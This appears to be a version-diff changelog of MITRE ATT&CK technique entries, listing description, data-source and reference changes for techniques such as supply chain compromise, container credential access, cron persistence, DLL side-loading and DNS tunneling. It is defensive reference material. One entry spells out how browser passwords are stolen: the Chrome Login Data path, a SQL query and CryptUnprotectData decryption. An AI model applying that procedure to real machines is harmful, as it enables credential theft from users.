| description | Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. | Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) | Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['File: File Metadata'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-11 14:17:21.153000+00:00 | 2022-04-28 16:04:36.636000+00:00 |
| description | Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) | Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API) An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. |
New Mitigations:
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-12 18:20:31.636000+00:00 | 2022-04-01 13:11:10.849000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Access |
| Description |
|---|
| Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)<br>In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell) |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 12:01:10.545000+00:00 | 2022-04-01 13:16:14.786000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Description |
|---|
| Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-27 17:38:17.146000+00:00 | 2022-04-01 13:06:58.794000+00:00 |
| x_mitre_data_sources[0] | Scheduled Job: Scheduled Job Creation | File: File Creation |
| x_mitre_data_sources[2] | File: File Creation | Scheduled Job: Scheduled Job Creation |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.<br>Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)<br>Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.<br>Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 18:37:11.672000+00:00 | 2022-03-11 19:01:55.821000+00:00 |
| x_mitre_version | 1.1 | 2.0 |
| x_mitre_data_sources[1] | File: File Creation | File: File Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| Old Description | New Description |
|---|---|
| Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). | Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence.<br>Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection) |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-03 20:11:52.175000+00:00 | 2022-04-20 16:52:58.415000+00:00 |
| description | Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). | Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence.<br>Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection) |
| external_references[1]['source_name'] | TechNet Services | AppleDocs Launch Agent Daemons |
| external_references[1]['description'] | Microsoft. (n.d.). Services. Retrieved June 7, 2016. | Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/library/cc772408.aspx | https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html |
| external_references[2]['source_name'] | AppleDocs Launch Agent Daemons | TechNet Services |
| external_references[2]['description'] | Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017. | Microsoft. (n.d.). Services. Retrieved June 7, 2016. |
| external_references[2]['url'] | https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html | https://technet.microsoft.com/en-us/library/cc772408.aspx |
| x_mitre_data_sources[0] | Service: Service Creation | Process: Process Creation |
| x_mitre_data_sources[1] | Service: Service Modification | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[2] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[3] | Process: OS API Execution | File: File Modification |
| x_mitre_data_sources[4] | Command: Command Execution | Driver: Driver Load |
| x_mitre_data_sources[5] | Windows Registry: Windows Registry Key Creation | Process: OS API Execution |
| x_mitre_data_sources[6] | Windows Registry: Windows Registry Key Modification | File: File Creation |
| x_mitre_data_sources[7] | File: File Creation | Service: Service Modification |
| x_mitre_data_sources[8] | File: File Modification | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Service: Service Creation |
| Description |
|---|
| Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-21 17:58:03.788000+00:00 | 2022-04-01 18:25:13.952000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Process: Process Access |
| x_mitre_data_sources[1] | File: File Access | Process: OS API Execution |
| x_mitre_data_sources[2] | Command: Command Execution | File: File Access |
| x_mitre_data_sources[3] | Process: OS API Execution | Process: Process Creation |
| x_mitre_data_sources[4] | Process: Process Access | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018) Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004). Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016) After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). | Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.<br>For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)<br>Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).<br>Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)<br>After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 14:03:47.293000+00:00 | 2022-02-15 19:29:57.405000+00:00 |
| description | Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.<br>For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)<br>Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).<br>Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)<br>After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). | Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.<br>For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)<br>Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).<br>Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)<br>After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. | Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.<br>An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_remote_support | False |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-23 15:29:36.918000+00:00 | 2022-03-24 17:33:03.443000+00:00 |
| description | Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.<br>An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. | Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.<br>An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). |
| x_mitre_data_sources[0] | Scheduled Job: Scheduled Job Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[3] | Process: Process Creation | Scheduled Job: Scheduled Job Creation |
| Description |
|---|
| Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020. | |
| external_references | CAPEC-641 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-641 | |
| external_references | Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 18:31:34.954000+00:00 | 2022-05-05 04:07:48.912000+00:00 |
| external_references[1]['source_name'] | capec | FireEye DLL Side-Loading |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/641.html | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf |
| external_references[2]['source_name'] | FireEye DLL Side-Loading | capec |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf | https://capec.mitre.org/data/definitions/641.html |
| x_mitre_data_sources[0] | File: File Creation | File: File Modification |
| x_mitre_data_sources[1] | File: File Modification | File: File Creation |
| x_mitre_defense_bypassed[1] | Application control | Application Control |
| Description |
|---|
| Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 16:26:34.196000+00:00 | 2022-06-17 13:52:03.232000+00:00 |
| external_references[1]['source_name'] | PAN DNS Tunneling | Medium DnsTunneling |
| external_references[1]['description'] | Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020. | Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020. |
| external_references[1]['url'] | https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling | https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000 |
| external_references[2]['source_name'] | Medium DnsTunneling | University of Birmingham C2 |
| external_references[2]['description'] | Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020. | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. |
| external_references[2]['url'] | https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000 | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf |
| external_references[3]['source_name'] | University of Birmingham C2 | PAN DNS Tunneling |
| external_references[3]['description'] | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. | Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020. |
| external_references[3]['url'] | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf | https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling |
| x_mitre_data_sources[0] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Chris Heald | |
| Old Description | New Description |
|---|---|
| Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records) Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:29:18.740000+00:00 | 2022-10-21 14:32:48.393000+00:00 |
